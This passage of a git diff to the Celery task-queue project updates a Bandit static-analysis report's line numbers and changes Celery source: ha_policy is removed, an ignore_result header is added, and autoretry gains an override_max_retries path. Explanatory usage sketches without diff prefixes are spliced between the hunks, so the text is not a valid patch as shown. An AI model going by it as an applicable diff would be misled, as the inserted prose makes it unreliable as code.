},
{
- "code": "613 proc in waiting_to_start):\n614 assert proc.outqR_fd in fileno_to_outq\n615 assert fileno_to_outq[proc.outqR_fd] is proc\n",
+ "code": "607 proc in waiting_to_start):\n608 assert proc.outqR_fd in fileno_to_outq\n609 assert fileno_to_outq[proc.outqR_fd] is proc\n",
"filename": "celery/concurrency/asynpool.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 614,
+ "line_number": 608,
"line_range": [
- 614
+ 608
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "614 assert proc.outqR_fd in fileno_to_outq\n615 assert fileno_to_outq[proc.outqR_fd] is proc\n616 assert proc.outqR_fd in hub.readers\n",
+ "code": "608 assert proc.outqR_fd in fileno_to_outq\n609 assert fileno_to_outq[proc.outqR_fd] is proc\n610 assert proc.outqR_fd in hub.readers\n",
"filename": "celery/concurrency/asynpool.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 615,
+ "line_number": 609,
"line_range": [
- 615
+ 609
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "615 assert fileno_to_outq[proc.outqR_fd] is proc\n616 assert proc.outqR_fd in hub.readers\n617 error('Timed out waiting for UP message from %r', proc)\n",
+ "code": "609 assert fileno_to_outq[proc.outqR_fd] is proc\n610 assert proc.outqR_fd in hub.readers\n611 error('Timed out waiting for UP message from %r', proc)\n",
"filename": "celery/concurrency/asynpool.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 616,
+ "line_number": 610,
"line_range": [
- 616
+ 610
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "636 \n637 assert not isblocking(proc.outq._reader)\n638 \n639 # handle_result_event is called when the processes outqueue is\n640 # readable.\n641 add_reader(proc.outqR_fd, handle_result_event, proc.outqR_fd)\n",
+ "code": "630 \n631 assert not isblocking(proc.outq._reader)\n632 \n633 # handle_result_event is called when the processes outqueue is\n634 # readable.\n635 add_reader(proc.outqR_fd, handle_result_event, proc.outqR_fd)\n",
"filename": "celery/concurrency/asynpool.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 637,
+ "line_number": 631,
"line_range": [
- 637,
- 638,
- 639,
- 640
+ 631,
+ 632,
+ 633,
+ 634
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "1090 synq = None\n1091 assert isblocking(inq._reader)\n1092 assert not isblocking(inq._writer)\n",
+ "code": "1088 synq = None\n1089 assert isblocking(inq._reader)\n1090 assert not isblocking(inq._writer)\n",
"filename": "celery/concurrency/asynpool.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 1091,
+ "line_number": 1089,
"line_range": [
- 1091
+ 1089
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "1091 assert isblocking(inq._reader)\n1092 assert not isblocking(inq._writer)\n1093 assert not isblocking(outq._reader)\n",
+ "code": "1089 assert isblocking(inq._reader)\n1090 assert not isblocking(inq._writer)\n1091 assert not isblocking(outq._reader)\n",
"filename": "celery/concurrency/asynpool.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 1092,
+ "line_number": 1090,
"line_range": [
- 1092
+ 1090
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "1092 assert not isblocking(inq._writer)\n1093 assert not isblocking(outq._reader)\n1094 assert isblocking(outq._writer)\n",
+ "code": "1090 assert not isblocking(inq._writer)\n1091 assert not isblocking(outq._reader)\n1092 assert isblocking(outq._writer)\n",
"filename": "celery/concurrency/asynpool.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 1093,
+ "line_number": 1091,
"line_range": [
- 1093
+ 1091
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "1093 assert not isblocking(outq._reader)\n1094 assert isblocking(outq._writer)\n1095 if self.synack:\n",
+ "code": "1091 assert not isblocking(outq._reader)\n1092 assert isblocking(outq._writer)\n1093 if self.synack:\n",
"filename": "celery/concurrency/asynpool.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 1094,
+ "line_number": 1092,
"line_range": [
- 1094
+ 1092
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "1096 synq = _SimpleQueue(wnonblock=True)\n1097 assert isblocking(synq._reader)\n1098 assert not isblocking(synq._writer)\n",
+ "code": "1094 synq = _SimpleQueue(wnonblock=True)\n1095 assert isblocking(synq._reader)\n1096 assert not isblocking(synq._writer)\n",
"filename": "celery/concurrency/asynpool.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 1097,
+ "line_number": 1095,
"line_range": [
- 1097
+ 1095
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "1097 assert isblocking(synq._reader)\n1098 assert not isblocking(synq._writer)\n1099 return inq, outq, synq\n",
+ "code": "1095 assert isblocking(synq._reader)\n1096 assert not isblocking(synq._writer)\n1097 return inq, outq, synq\n",
"filename": "celery/concurrency/asynpool.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 1098,
+ "line_number": 1096,
"line_range": [
- 1098
+ 1096
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "1109 return logger.warning('process with pid=%s already exited', pid)\n1110 assert proc.inqW_fd not in self._fileno_to_inq\n1111 assert proc.inqW_fd not in self._all_inqueues\n",
+ "code": "1107 return logger.warning('process with pid=%s already exited', pid)\n1108 assert proc.inqW_fd not in self._fileno_to_inq\n1109 assert proc.inqW_fd not in self._all_inqueues\n",
"filename": "celery/concurrency/asynpool.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 1110,
+ "line_number": 1108,
"line_range": [
- 1110
+ 1108
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "1110 assert proc.inqW_fd not in self._fileno_to_inq\n1111 assert proc.inqW_fd not in self._all_inqueues\n1112 self._waiting_to_start.discard(proc)\n",
+ "code": "1108 assert proc.inqW_fd not in self._fileno_to_inq\n1109 assert proc.inqW_fd not in self._all_inqueues\n1110 self._waiting_to_start.discard(proc)\n",
"filename": "celery/concurrency/asynpool.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 1111,
+ "line_number": 1109,
"line_range": [
- 1111
+ 1109
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "1189 \"\"\"Mark new ownership for ``queues`` to update fileno indices.\"\"\"\n1190 assert queues in self._queues\n1191 b = len(self._queues)\n",
+ "code": "1187 \"\"\"Mark new ownership for ``queues`` to update fileno indices.\"\"\"\n1188 assert queues in self._queues\n1189 b = len(self._queues)\n",
"filename": "celery/concurrency/asynpool.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 1190,
+ "line_number": 1188,
"line_range": [
- 1190
+ 1188
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "1192 self._queues[queues] = proc\n1193 assert b == len(self._queues)\n1194 \n",
+ "code": "1190 self._queues[queues] = proc\n1191 assert b == len(self._queues)\n1192 \n",
"filename": "celery/concurrency/asynpool.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 1193,
+ "line_number": 1191,
"line_range": [
- 1193
+ 1191
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "1272 pass\n1273 assert len(self._queues) == before\n1274 \n",
+ "code": "1270 pass\n1271 assert len(self._queues) == before\n1272 \n",
"filename": "celery/concurrency/asynpool.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 1273,
+ "line_number": 1271,
"line_range": [
- 1273
+ 1271
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "1279 \"\"\"\n1280 assert not proc._is_alive()\n1281 self._waiting_to_start.discard(proc)\n",
+ "code": "1277 \"\"\"\n1278 assert not proc._is_alive()\n1279 self._waiting_to_start.discard(proc)\n",
"filename": "celery/concurrency/asynpool.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 1280,
+ "line_number": 1278,
"line_range": [
- 1280
+ 1278
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "81 with allow_join_result():\n82 assert ping.delay().get(timeout=ping_task_timeout) == 'pong'\n83 \n",
+ "code": "85 with allow_join_result():\n86 assert ping.delay().get(timeout=ping_task_timeout) == 'pong'\n87 \n",
"filename": "celery/contrib/testing/worker.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 82,
+ "line_number": 86,
"line_range": [
- 82
+ 86
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "104 if perform_ping_check:\n105 assert 'celery.ping' in app.tasks\n106 # Make sure we can connect to the broker\n",
+ "code": "109 if perform_ping_check:\n110 assert 'celery.ping' in app.tasks\n111 # Make sure we can connect to the broker\n",
"filename": "celery/contrib/testing/worker.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 105,
+ "line_number": 110,
"line_range": [
- 105
+ 110
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "169 return self.win.getkey().upper()\n170 except Exception: # pylint: disable=broad-except\n171 pass\n",
+ "code": "169 return self.win.getkey().upper()\n170 except Exception: # pylint: disable=broad-except\n171 pass\n172 \n",
"filename": "celery/events/cursesmon.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Try, Except, Pass detected.",
"line_number": 170,
"line_range": [
- 170
+ 170,
+ 171
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b110_try_except_pass.html",
"test_id": "B110",
"test_name": "try_except_pass"
},
{
- "code": "481 max_groups = os.sysconf('SC_NGROUPS_MAX')\n482 except Exception: # pylint: disable=broad-except\n483 pass\n",
+ "code": "488 max_groups = os.sysconf('SC_NGROUPS_MAX')\n489 except Exception: # pylint: disable=broad-except\n490 pass\n491 try:\n",
"filename": "celery/platforms.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Try, Except, Pass detected.",
- "line_number": 482,
+ "line_number": 489,
"line_range": [
- 482
+ 489,
+ 490
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b110_try_except_pass.html",
"test_id": "B110",
@@ -2386,84 +2330,86 @@
"test_name": "assert_used"
},
{
- "code": "277 # Tasks are rarely, if ever, created at runtime - exec here is fine.\n278 exec(definition, namespace)\n279 result = namespace[name]\n",
+ "code": "332 # Tasks are rarely, if ever, created at runtime - exec here is fine.\n333 exec(definition, namespace)\n334 result = namespace[name]\n",
"filename": "celery/utils/functional.py",
"issue_confidence": "HIGH",
"issue_severity": "MEDIUM",
"issue_text": "Use of exec detected.",
- "line_number": 278,
+ "line_number": 333,
"line_range": [
- 278
+ 333
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b102_exec_used.html",
"test_id": "B102",
"test_name": "exec_used"
},
{
- "code": "15 try:\n16 import cPickle as pickle\n17 except ImportError:\n",
+ "code": "13 try:\n14 import cPickle as pickle\n15 except ImportError:\n",
"filename": "celery/utils/serialization.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Consider possible security implications associated with cPickle module.",
- "line_number": 16,
+ "line_number": 14,
"line_range": [
- 16
+ 14
],
"more_info": "https://bandit.readthedocs.io/en/latest/blacklists/blacklist_imports.html#b403-import-pickle",
"test_id": "B403",
"test_name": "blacklist"
},
{
- "code": "17 except ImportError:\n18 import pickle # noqa\n19 \n",
+ "code": "15 except ImportError:\n16 import pickle\n17 \n",
"filename": "celery/utils/serialization.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Consider possible security implications associated with pickle module.",
- "line_number": 18,
+ "line_number": 16,
"line_range": [
- 18
+ 16
],
"more_info": "https://bandit.readthedocs.io/en/latest/blacklists/blacklist_imports.html#b403-import-pickle",
"test_id": "B403",
"test_name": "blacklist"
},
{
- "code": "64 loads(dumps(superexc))\n65 except Exception: # pylint: disable=broad-except\n66 pass\n",
+ "code": "62 loads(dumps(superexc))\n63 except Exception: # pylint: disable=broad-except\n64 pass\n65 else:\n",
"filename": "celery/utils/serialization.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Try, Except, Pass detected.",
- "line_number": 65,
+ "line_number": 63,
"line_range": [
- 65
+ 63,
+ 64
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b110_try_except_pass.html",
"test_id": "B110",
"test_name": "try_except_pass"
},
{
- "code": "158 try:\n159 pickle.loads(pickle.dumps(exc))\n160 except Exception: # pylint: disable=broad-except\n",
+ "code": "156 try:\n157 pickle.loads(pickle.dumps(exc))\n158 except Exception: # pylint: disable=broad-except\n",
"filename": "celery/utils/serialization.py",
"issue_confidence": "HIGH",
"issue_severity": "MEDIUM",
"issue_text": "Pickle and modules that wrap it can be unsafe when used to deserialize untrusted data, possible security issue.",
- "line_number": 159,
+ "line_number": 157,
"line_range": [
- 159
+ 157
],
"more_info": "https://bandit.readthedocs.io/en/latest/blacklists/blacklist_calls.html#b301-pickle",
"test_id": "B301",
"test_name": "blacklist"
},
{
- "code": "159 pickle.loads(pickle.dumps(exc))\n160 except Exception: # pylint: disable=broad-except\n161 pass\n",
+ "code": "157 pickle.loads(pickle.dumps(exc))\n158 except Exception: # pylint: disable=broad-except\n159 pass\n160 else:\n",
"filename": "celery/utils/serialization.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Try, Except, Pass detected.",
- "line_number": 160,
+ "line_number": 158,
"line_range": [
- 160
+ 158,
+ 159
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b110_try_except_pass.html",
"test_id": "B110",
@@ -2498,18 +2444,32 @@
"test_name": "assert_used"
},
{
- "code": "335 self.connection.collect()\n336 except Exception: # pylint: disable=broad-except\n337 pass\n",
+ "code": "350 self.connection.collect()\n351 except Exception: # pylint: disable=broad-except\n352 pass\n353 \n",
"filename": "celery/worker/consumer/consumer.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Try, Except, Pass detected.",
- "line_number": 336,
+ "line_number": 351,
"line_range": [
- 336
+ 351,
+ 352
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b110_try_except_pass.html",
"test_id": "B110",
"test_name": "try_except_pass"
+ },
+ {
+ "code": "7 import platform\n8 import shelve\n9 import sys\n",
+ "filename": "celery/worker/state.py",
+ "issue_confidence": "HIGH",
+ "issue_severity": "LOW",
+ "issue_text": "Consider possible security implications associated with shelve module.",
+ "line_number": 8,
+ "line_range": [
+ 8
+ ],
+ "more_info": "https://bandit.readthedocs.io/en/latest/blacklists/blacklist_imports.html#b403-import-pickle",
+ "test_id": "B403",
+ "test_name": "blacklist"
}
]
-}
\ No newline at end of file
diff --git a/celery/__init__.py b/celery/__init__.py
index 9ccaae8874d..19f860fd0d5 100644
--- a/celery/__init__.py
+++ b/celery/__init__.py
@@ -1,5 +1,5 @@
"""Distributed Task Queue."""
-# :copyright: (c) 2016-20206 Asif Saif Uddin, celery core and individual
+# :copyright: (c) 2016-2026 Asif Saif Uddin, celery core and individual
# contributors, All rights reserved.
# :copyright: (c) 2015-2016 Ask Solem. All rights reserved.
# :copyright: (c) 2012-2014 GoPivotal, Inc., All rights reserved.
@@ -13,11 +13,11 @@
from collections import namedtuple
# Lazy loading
-from . import local # noqa
+from . import local
-SERIES = 'singularity'
+SERIES = 'dawn-chorus'
-__version__ = '5.0.0'
+__version__ = '5.2.2'
__author__ = 'Ask Solem'
__contact__ = 'auvipy@gmail.com'
__homepage__ = 'http://celeryproject.org'
@@ -27,7 +27,7 @@
# -eof meta-
__all__ = (
- 'Celery', 'bugreport', 'shared_task', 'task', 'Task',
+ 'Celery', 'bugreport', 'shared_task', 'Task',
'current_app', 'current_task', 'maybe_signature',
'chain', 'chord', 'chunks', 'group', 'signature',
'xmap', 'xstarmap', 'uuid',
@@ -65,15 +65,15 @@ def debug_import(name, locals=None, globals=None,
STATICA_HACK = True
globals()['kcah_acitats'[::-1].upper()] = False
if STATICA_HACK: # pragma: no cover
- from celery._state import current_app, current_task # noqa
- from celery.app import shared_task # noqa
- from celery.app.base import Celery # noqa
- from celery.app.task import Task # noqa
- from celery.app.utils import bugreport # noqa
+ from celery._state import current_app, current_task
+ from celery.app import shared_task
+ from celery.app.base import Celery
+ from celery.app.task import Task
+ from celery.app.utils import bugreport
from celery.canvas import (chain, chord, chunks, group, # noqa
maybe_signature, signature, subtask, xmap,
xstarmap)
- from celery.utils import uuid # noqa
+ from celery.utils import uuid
# Eventlet/gevent patching must happen before importing
# anything else, so these tools must be at top-level.
@@ -142,7 +142,8 @@ def maybe_patch_concurrency(argv=None, short_opts=None,
# set up eventlet/gevent environments ASAP
from celery import concurrency
- concurrency.get_implementation(pool)
+ if pool in concurrency.get_available_pool_names():
+ concurrency.get_implementation(pool)
# this just creates a new module, that imports stuff on first attribute
@@ -160,7 +161,6 @@ def maybe_patch_concurrency(argv=None, short_opts=None,
],
'celery.utils': ['uuid'],
},
- direct={'task': 'celery.task'},
__package__='celery', __file__=__file__,
__path__=__path__, __doc__=__doc__, __version__=__version__,
__author__=__author__, __contact__=__contact__,
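A minimal usage sketch of the guarded pool patching shown in the hunk above; the project name and argv are illustrative assumptions, not taken from this patch:

    # maybe_patch_concurrency() inspects argv for -P/--pool and, with this
    # change, only calls get_implementation() when the pool name is one of
    # the available implementations, so unknown names no longer raise here.
    import celery

    argv = ['celery', '-A', 'proj', 'worker', '-P', 'eventlet']  # example only
    celery.maybe_patch_concurrency(argv)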
diff --git a/celery/_state.py b/celery/_state.py
index 0e671151685..5d3ed5fc56f 100644
--- a/celery/_state.py
+++ b/celery/_state.py
@@ -109,9 +109,9 @@ def get_current_app():
"""Return the current app."""
raise RuntimeError('USES CURRENT APP')
elif os.environ.get('C_WARN_APP'): # pragma: no cover
- def get_current_app(): # noqa
+ def get_current_app():
import traceback
- print('-- USES CURRENT_APP', file=sys.stderr) # noqa+
+ print('-- USES CURRENT_APP', file=sys.stderr) # +
traceback.print_stack(file=sys.stderr)
return _get_current_app()
else:
@@ -168,12 +168,12 @@ def _app_or_default_trace(app=None): # pragma: no cover
current_process = None
if app is None:
if getattr(_tls, 'current_app', None):
- print('-- RETURNING TO CURRENT APP --') # noqa+
+ print('-- RETURNING TO CURRENT APP --') # +
print_stack()
return _tls.current_app
if not current_process or current_process()._name == 'MainProcess':
raise Exception('DEFAULT APP')
- print('-- RETURNING TO DEFAULT APP --') # noqa+
+ print('-- RETURNING TO DEFAULT APP --') # +
print_stack()
return default_app
return app
diff --git a/celery/app/amqp.py b/celery/app/amqp.py
index 7031bc8b9b6..10747eed93b 100644
--- a/celery/app/amqp.py
+++ b/celery/app/amqp.py
@@ -46,7 +46,6 @@ class Queues(dict):
create_missing (bool): By default any unknown queues will be
added automatically, but if this flag is disabled the occurrence
of unknown queues in `wanted` will raise :exc:`KeyError`.
- ha_policy (Sequence, str): Default HA policy for queues with none set.
max_priority (int): Default x-max-priority for queues with none set.
"""
@@ -55,14 +54,13 @@ class Queues(dict):
_consume_from = None
def __init__(self, queues=None, default_exchange=None,
- create_missing=True, ha_policy=None, autoexchange=None,
+ create_missing=True, autoexchange=None,
max_priority=None, default_routing_key=None):
- dict.__init__(self)
+ super().__init__()
self.aliases = WeakValueDictionary()
self.default_exchange = default_exchange
self.default_routing_key = default_routing_key
self.create_missing = create_missing
- self.ha_policy = ha_policy
self.autoexchange = Exchange if autoexchange is None else autoexchange
self.max_priority = max_priority
if queues is not None and not isinstance(queues, Mapping):
@@ -75,12 +73,12 @@ def __getitem__(self, name):
try:
return self.aliases[name]
except KeyError:
- return dict.__getitem__(self, name)
+ return super().__getitem__(name)
def __setitem__(self, name, queue):
if self.default_exchange and not queue.exchange:
queue.exchange = self.default_exchange
- dict.__setitem__(self, name, queue)
+ super().__setitem__(name, queue)
if queue.alias:
self.aliases[queue.alias] = queue
@@ -122,10 +120,6 @@ def _add(self, queue):
queue.exchange = self.default_exchange
if not queue.routing_key:
queue.routing_key = self.default_routing_key
- if self.ha_policy:
- if queue.queue_arguments is None:
- queue.queue_arguments = {}
- self._set_ha_policy(queue.queue_arguments)
if self.max_priority is not None:
if queue.queue_arguments is None:
queue.queue_arguments = {}
@@ -133,13 +127,6 @@ def _add(self, queue):
self[queue.name] = queue
return queue
- def _set_ha_policy(self, args):
- policy = self.ha_policy
- if isinstance(policy, (list, tuple)):
- return args.update({'ha-mode': 'nodes',
- 'ha-params': list(policy)})
- args['ha-mode'] = policy
-
def _set_max_priority(self, args):
if 'x-max-priority' not in args and self.max_priority is not None:
return args.update({'x-max-priority': self.max_priority})
@@ -251,7 +238,7 @@ def create_task_message(self):
def send_task_message(self):
return self._create_task_sender()
- def Queues(self, queues, create_missing=None, ha_policy=None,
+ def Queues(self, queues, create_missing=None,
autoexchange=None, max_priority=None):
# Create new :class:`Queues` instance, using queue defaults
# from the current configuration.
@@ -259,8 +246,6 @@ def Queues(self, queues, create_missing=None, ha_policy=None,
default_routing_key = conf.task_default_routing_key
if create_missing is None:
create_missing = conf.task_create_missing_queues
- if ha_policy is None:
- ha_policy = conf.task_queue_ha_policy
if max_priority is None:
max_priority = conf.task_queue_max_priority
if not queues and conf.task_default_queue:
@@ -271,7 +256,7 @@ def Queues(self, queues, create_missing=None, ha_policy=None,
else autoexchange)
return self.queues_cls(
queues, self.default_exchange, create_missing,
- ha_policy, autoexchange, max_priority, default_routing_key,
+ autoexchange, max_priority, default_routing_key,
)
def Router(self, queues=None, create_missing=None):
@@ -299,7 +284,7 @@ def as_task_v2(self, task_id, name, args=None, kwargs=None,
time_limit=None, soft_time_limit=None,
create_sent_event=False, root_id=None, parent_id=None,
shadow=None, chain=None, now=None, timezone=None,
- origin=None, argsrepr=None, kwargsrepr=None):
+ origin=None, ignore_result=False, argsrepr=None, kwargsrepr=None):
args = args or ()
kwargs = kwargs or {}
if not isinstance(args, (list, tuple)):
@@ -331,13 +316,6 @@ def as_task_v2(self, task_id, name, args=None, kwargs=None,
if kwargsrepr is None:
kwargsrepr = saferepr(kwargs, self.kwargsrepr_maxsize)
- if callbacks:
- callbacks = [utf8dict(callback) for callback in callbacks]
- if errbacks:
- errbacks = [utf8dict(errback) for errback in errbacks]
- if chord:
- chord = utf8dict(chord)
-
if not root_id: # empty root_id defaults to task_id
root_id = task_id
@@ -357,7 +335,8 @@ def as_task_v2(self, task_id, name, args=None, kwargs=None,
'parent_id': parent_id,
'argsrepr': argsrepr,
'kwargsrepr': kwargsrepr,
- 'origin': origin or anon_nodename()
+ 'origin': origin or anon_nodename(),
+ 'ignore_result': ignore_result,
},
properties={
'correlation_id': task_id,
@@ -410,13 +389,6 @@ def as_task_v1(self, task_id, name, args=None, kwargs=None,
eta = eta and eta.isoformat()
expires = expires and expires.isoformat()
- if callbacks:
- callbacks = [utf8dict(callback) for callback in callbacks]
- if errbacks:
- errbacks = [utf8dict(errback) for errback in errbacks]
- if chord:
- chord = utf8dict(chord)
-
return task_message(
headers={},
properties={
@@ -586,7 +558,7 @@ def queues(self):
"""Queue name⇒ declaration mapping."""
return self.Queues(self.app.conf.task_queues)
- @queues.setter # noqa
+ @queues.setter
def queues(self, queues):
return self.Queues(queues)
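A hedged sketch of two behavioural changes above: the removed ``ha_policy`` argument (queue HA is now expected to be configured through broker policies rather than queue arguments) and the ``ignore_result`` flag that ``send_task()`` pops and forwards in the v2 message headers. The app and task name are illustrative assumptions:

    from celery import Celery

    app = Celery('proj', broker='amqp://', backend='rpc://')

    # ignore_result=True is popped in send_task() and placed into the
    # message headers, so the worker skips storing a result for this call.
    app.send_task('proj.tasks.add', args=(2, 2), ignore_result=True)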
diff --git a/celery/app/autoretry.py b/celery/app/autoretry.py
index 21c90e026a2..a5fe700b650 100644
--- a/celery/app/autoretry.py
+++ b/celery/app/autoretry.py
@@ -33,7 +33,7 @@ def run(*args, **kwargs):
try:
return task._orig_run(*args, **kwargs)
except Ignore:
- # If Ignore signal occures task shouldn't be retried,
+            # If Ignore signal occurs, the task shouldn't be retried,
# even if it suits autoretry_for list
raise
except Retry:
@@ -46,6 +46,15 @@ def run(*args, **kwargs):
retries=task.request.retries,
maximum=retry_backoff_max,
full_jitter=retry_jitter)
- raise task.retry(exc=exc, **retry_kwargs)
+ # Override max_retries
+ if hasattr(task, 'override_max_retries'):
+ retry_kwargs['max_retries'] = getattr(task,
+ 'override_max_retries',
+ task.max_retries)
+ ret = task.retry(exc=exc, **retry_kwargs)
+ # Stop propagation
+ if hasattr(task, 'override_max_retries'):
+ delattr(task, 'override_max_retries')
+ raise ret
task._orig_run, task.run = task.run, run
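A hedged sketch of the ``override_max_retries`` bookkeeping above: an explicit ``self.retry(max_retries=...)`` inside a task decorated with ``autoretry_for`` is remembered, so the wrapper's automatic retry honours the larger budget. The helper functions are hypothetical:

    from celery import Celery

    app = Celery('proj', broker='amqp://')

    @app.task(bind=True, autoretry_for=(ConnectionError,),
              retry_backoff=True, max_retries=3)
    def fetch(self, url):
        if looks_transient(url):      # hypothetical helper
            # Explicit retry with a larger budget; the wrapper records
            # override_max_retries so automatic retries use 10, not 3.
            raise self.retry(max_retries=10, countdown=5)
        return download(url)          # hypothetical helper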
diff --git a/celery/app/base.py b/celery/app/base.py
index dc7c41d804f..671fc846ac6 100644
--- a/celery/app/base.py
+++ b/celery/app/base.py
@@ -1,12 +1,14 @@
"""Actual App instance implementation."""
import inspect
import os
+import sys
import threading
import warnings
from collections import UserDict, defaultdict, deque
from datetime import datetime
from operator import attrgetter
+from click.exceptions import Exit
from kombu import pools
from kombu.clocks import LamportClock
from kombu.common import oid_from
@@ -30,7 +32,7 @@
from celery.utils.imports import gen_task_name, instantiate, symbol_by_name
from celery.utils.log import get_logger
from celery.utils.objects import FallbackContext, mro_lookup
-from celery.utils.time import timezone, to_utc
+from celery.utils.time import maybe_make_aware, timezone, to_utc
# Load all builtin tasks
from . import builtins # noqa
@@ -204,6 +206,8 @@ class name.
task_cls = 'celery.app.task:Task'
registry_cls = 'celery.app.registry:TaskRegistry'
+ #: Thread local storage.
+ _local = None
_fixups = None
_pool = None
_conf = None
@@ -227,6 +231,9 @@ def __init__(self, main=None, loader=None, backend=None,
changes=None, config_source=None, fixups=None, task_cls=None,
autofinalize=True, namespace=None, strict_typing=True,
**kwargs):
+
+ self._local = threading.local()
+
self.clock = LamportClock()
self.main = main
self.amqp_cls = amqp or self.amqp_cls
@@ -267,8 +274,10 @@ def __init__(self, main=None, loader=None, backend=None,
self.__autoset('broker_url', broker)
self.__autoset('result_backend', backend)
self.__autoset('include', include)
- self.__autoset('broker_use_ssl', kwargs.get('broker_use_ssl'))
- self.__autoset('redis_backend_use_ssl', kwargs.get('redis_backend_use_ssl'))
+
+ for key, value in kwargs.items():
+ self.__autoset(key, value)
+
self._conf = Settings(
PendingConfiguration(
self._preconf, self._finalize_pending_conf),
@@ -295,6 +304,10 @@ def __init__(self, main=None, loader=None, backend=None,
self.on_after_finalize = Signal(name='app.on_after_finalize')
